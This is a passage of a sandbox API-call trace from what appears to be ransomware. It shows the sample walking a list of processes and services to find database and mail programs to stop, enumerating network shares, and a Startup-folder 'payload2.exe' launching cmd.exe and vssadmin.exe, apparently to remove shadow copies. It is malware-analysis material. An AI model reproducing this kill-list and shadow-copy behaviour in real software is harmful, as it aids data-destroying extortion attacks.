[0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0055.537] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0055.537] lstrlenW (lpString="Winmgmt") returned 7 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0055.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0055.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0055.538] lstrlenW (lpString="WPDBusEnum") returned 10 [0055.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0055.538] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0055.538] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0055.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0055.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0055.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0055.540] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.540] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.541] lstrlenW (lpString="System") returned 6 [0055.541] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0055.541] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0055.541] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.542] lstrlenW (lpString="smss.exe") returned 8 [0055.542] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0055.542] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0055.543] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0055.543] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0055.543] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0055.543] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0055.543] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0055.543] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.544] lstrlenW (lpString="csrss.exe") returned 9 [0055.544] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0055.544] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0055.544] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0055.544] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0055.544] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0055.544] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0055.544] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0055.544] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.545] lstrlenW (lpString="wininit.exe") returned 11 [0055.545] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0055.545] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0055.545] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0055.545] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.546] lstrlenW (lpString="csrss.exe") returned 9 [0055.546] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.546] lstrlenW (lpString="winlogon.exe") returned 12 [0055.546] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.547] lstrlenW (lpString="services.exe") returned 12 [0055.547] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.547] lstrlenW (lpString="lsass.exe") returned 9 [0055.547] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0055.548] lstrlenW (lpString="lsm.exe") returned 7 [0055.548] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.549] lstrlenW (lpString="svchost.exe") returned 11 [0055.549] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.550] lstrlenW (lpString="svchost.exe") returned 11 [0055.550] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.550] lstrlenW (lpString="svchost.exe") returned 11 [0055.550] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.551] lstrlenW (lpString="svchost.exe") returned 11 [0055.551] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.551] lstrlenW (lpString="svchost.exe") returned 11 [0055.551] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.552] lstrlenW (lpString="audiodg.exe") returned 11 [0055.552] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.555] lstrlenW (lpString="svchost.exe") returned 11 [0055.555] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.556] lstrlenW (lpString="svchost.exe") returned 11 [0055.556] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.557] lstrlenW (lpString="dwm.exe") returned 7 [0055.557] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.557] lstrlenW (lpString="explorer.exe") returned 12 [0055.557] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.558] lstrlenW (lpString="spoolsv.exe") returned 11 [0055.558] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.566] lstrlenW (lpString="taskhost.exe") returned 12 [0055.567] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.567] lstrlenW (lpString="svchost.exe") returned 11 [0055.567] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0055.609] lstrlenW (lpString="taskeng.exe") returned 11 [0055.609] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0055.610] lstrlenW (lpString="taskhost.exe") returned 12 [0055.610] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0055.611] lstrlenW (lpString="challenging.exe") returned 15 [0055.611] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0055.611] lstrlenW (lpString="pgp prix.exe") returned 12 [0055.611] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0055.612] lstrlenW (lpString="user-reno.exe") returned 13 [0055.612] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0055.613] lstrlenW (lpString="aggregate.exe") returned 13 [0055.613] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0055.613] lstrlenW (lpString="dressed.exe") returned 11 [0055.613] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0055.614] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0055.614] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0055.615] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0055.615] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0055.615] lstrlenW (lpString="developing.exe") returned 14 [0055.615] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0055.616] lstrlenW (lpString="supported.exe") returned 13 [0055.616] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0055.616] lstrlenW (lpString="girlstionselect.exe") returned 19 [0055.616] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0055.617] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0055.617] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0055.618] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0055.618] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0055.712] lstrlenW (lpString="eating.exe") returned 10 [0055.712] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0055.712] lstrlenW (lpString="nh_protected.exe") returned 16 [0055.712] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0055.713] lstrlenW (lpString="vulnerability.exe") returned 17 [0055.713] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0055.714] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0055.714] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0055.714] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0055.714] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0055.715] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0055.715] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0055.716] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0055.716] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.716] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0055.716] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0055.717] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0055.717] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0055.717] lstrlenW (lpString="cmd.exe") returned 7 [0055.717] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.718] lstrlenW (lpString="conhost.exe") returned 11 [0055.718] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0055.719] lstrlenW (lpString="vssadmin.exe") returned 12 [0055.719] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0055.719] lstrlenW (lpString="VSSVC.exe") returned 9 [0055.719] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.720] lstrlenW (lpString="svchost.exe") returned 11 [0055.720] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0055.720] lstrlenW (lpString="LogonUI.exe") returned 11 [0055.721] Process32NextW (in: hSnapshot=0x1f4, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0055.721] CloseHandle (hObject=0x1f4) returned 1 [0055.721] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0x9c0 [0033.876] WaitForSingleObject (hHandle=0x18fde4, dwMilliseconds=0xffffffff) returned 0xffffffff [0033.876] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x634bb0 | out: hHeap=0x600000) returned 1 Thread: id = 6 os_tid = 0x9c4 [0033.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.877] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635dd0 [0033.877] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635dd0, Size=0x40) returned 0x636db0 [0033.877] GetLogicalDrives () returned 0x4 [0033.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x66e618 [0033.877] GetComputerNameW (in: lpBuffer=0x66e61c, nSize=0x235ff6c | out: lpBuffer="XDUWTFONO", nSize=0x235ff6c) returned 1 [0033.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1000) returned 0x67e620 [0033.878] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x235ff3c | out: lphEnum=0x235ff3c*=0x636320) returned 0x0 [0033.878] WNetEnumResourceW (in: hEnum=0x636320, lpcCount=0x235ff38, lpBuffer=0x67e620, lpBufferSize=0x235ff40 | out: lpcCount=0x235ff38, lpBuffer=0x67e620, lpBufferSize=0x235ff40) returned 0x103 [0033.878] WNetCloseEnum (hEnum=0x636320) returned 0x0 [0033.878] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x235ff3c | out: lphEnum=0x235ff3c*=0x3942be8) returned 0x0 [0039.898] WNetEnumResourceW (in: hEnum=0x3942be8, lpcCount=0x235ff38, lpBuffer=0x67e620, lpBufferSize=0x235ff40 | out: lpcCount=0x235ff38, lpBuffer=0x67e620, lpBufferSize=0x235ff40) returned 0x0 [0039.898] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1000) returned 0x3ed3090 [0039.898] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x67e620, lphEnum=0x235ff10 | out: lphEnum=0x235ff10*=0x6364a0) returned 0x0 [0040.065] WNetEnumResourceW (in: hEnum=0x6364a0, lpcCount=0x235ff0c, lpBuffer=0x3ed3090, lpBufferSize=0x235ff14 | out: lpcCount=0x235ff0c, lpBuffer=0x3ed3090, lpBufferSize=0x235ff14) returned 0x103 [0040.065] WNetCloseEnum (hEnum=0x6364a0) returned 0x0 [0040.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1000) returned 0x3ed70b0 [0040.065] WNetOpenEnumW (dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x67e640, lphEnum=0x235ff10) Thread: id = 7 os_tid = 0x9c8 [0035.020] GetTickCount () returned 0x17f6b [0035.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x24) returned 0x67f838 [0035.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 